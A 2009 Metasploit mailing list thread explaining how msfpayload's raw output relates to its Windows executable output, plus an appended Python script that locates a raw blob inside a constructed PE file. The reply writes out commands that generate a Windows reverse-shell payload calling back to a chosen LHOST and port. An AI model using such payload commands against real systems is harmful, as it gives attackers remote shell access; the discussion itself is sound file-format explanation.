Metasploit mailing list archives

raw format of msfpayload


From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Tue, 7 Apr 2009 14:47:54 +0100

Antonios,

I think that's correct. If you do:

./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 R > temp.raw
and
./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 X > temp.exe

then open up both files with a hex editor, you will see that the temp.raw
contents are included in temp.exe.

The difference in size (thus data) between the raw and executable output is
the information necessary for the Windows OS loader to manage the
wrapped executable code (or, if you like, the temp.raw).

Hope that helps.
Tasos

2009/4/7 Antonios Atlasis <atlasis at telecom.ece.ntua.gr>

Hello to everybody,

I'd like to clarify something, if possible, please. The raw output format
of msfpayload is machine language, excluding PE headers of "normal" exe
files, correct?

Thanks in advance

Antonios


-- 
AM
Key ID: 0x5EB17EE7
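
The hex-editor comparison described in this thread can be scripted. The following is an added example, not part of the original messages: it reads the PE headers of an executable, finds where a raw blob sits inside it, and reports how many bytes are loader metadata and padding. The sample file, the placeholder blob and all function names are constructed for illustration, and the sample omits the optional header that a real PE carries.

```python
import struct

def build_sample_exe(blob: bytes) -> bytes:
    """Constructed minimal PE-style file: headers plus one section holding blob."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)  # 1 section, no optional header
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000,
                       0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + sect).ljust(0x200, b"\0")
    body = (b"\0" * 0x10 + blob).ljust(0x200, b"\0")             # blob embedded in section data
    return headers + body

def locate_raw_in_exe(exe: bytes, raw: bytes):
    """Return file offset, containing section and header overhead, or None if absent."""
    if exe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", exe, 0x3C)[0]
    if exe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", exe, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size      # section table follows the optional header
    offset = exe.find(raw)
    if offset < 0:
        return None
    section = None
    for i in range(nsect):                # each section header is 40 bytes
        name, _, _, rsize, rptr = struct.unpack_from("<8sIIII", exe, table + 40 * i)
        if rptr <= offset < rptr + rsize:
            section = name.rstrip(b"\0").decode("ascii", "replace")
    return {"offset": offset, "section": section, "overhead": len(exe) - len(raw)}

# Constructed placeholder standing in for temp.raw; it is not real payload bytes.
SAMPLE_RAW = bytes(range(1, 65))

if __name__ == "__main__":
    print(locate_raw_in_exe(build_sample_exe(SAMPLE_RAW), SAMPLE_RAW))
```

To compare real files, pass the bytes of temp.exe and temp.raw read with `open(path, "rb").read()` to `locate_raw_in_exe`.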